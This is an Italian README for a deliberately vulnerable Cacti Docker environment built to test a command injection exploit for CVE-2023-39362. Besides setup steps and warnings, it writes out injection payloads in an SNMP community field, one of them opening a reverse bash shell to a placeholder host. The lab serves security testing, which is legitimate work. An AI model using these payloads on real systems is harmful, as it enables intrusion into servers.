
ATTENZIONE: Questa è un'applicazione vulnerabile per testare l'exploit per l'iniezione di comandi Cacti (CVE-2023-39362). Eseguila a tuo rischio e pericolo!
Questa è un'applicazione vulnerabile per testare l'exploit per la vulnerabilità Cacti (CVE-2023-39362).
Questa applicazione contiene gravi vulnerabilità di sicurezza. Eseguila a tuo rischio! Si consiglia di utilizzare un ambiente di backup e protetto (come una VM con uno snapshot recente e rete solo-host). Non caricare questa applicazione su server esposti a Internet, poiché verranno compromessi.
DICHIARAZIONE DI NON RESPONSABILITÀ: non mi assumo la responsabilità del modo in cui chiunque utilizzi questa applicazione. L'unico scopo di questa applicazione è essere uno scenario di test per l'exploit di CVE-2023-39362 e non deve essere usata in modo dannoso. Se il tuo server viene compromesso tramite un'installazione di questa applicazione, non è colpa mia, ma delle persone che l'hanno caricata e installata.
Ecco i passaggi per configurare l'ambiente:
docker compose up -d per avviare la composizione.admin/admin.admin.guest.guest per provare l'exploit.Il container si chiamerà vuln-cacti.
L'hostname per un dispositivo SNMP di test è monitored_snmp_device.
Per smontare l'ambiente usa il comando docker compose down.
La guida all'installazione ufficiale di Cacti si trova qui.
Una descrizione dettagliata della causa principale della vulnerabilità è disponibile nell'avviso di sicurezza originale o nel mio post sul blog.
(Questa è solo una possibile exploit)
public\' ; touch /tmp/m3ssap0 ; \'./tmp la presenza del file creato.Per ottenere una reverse shell, si può usare un payload come il seguente.
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
Questo progetto è concesso in licenza sotto la Unlicense - vedi il file LICENSE per i dettagli.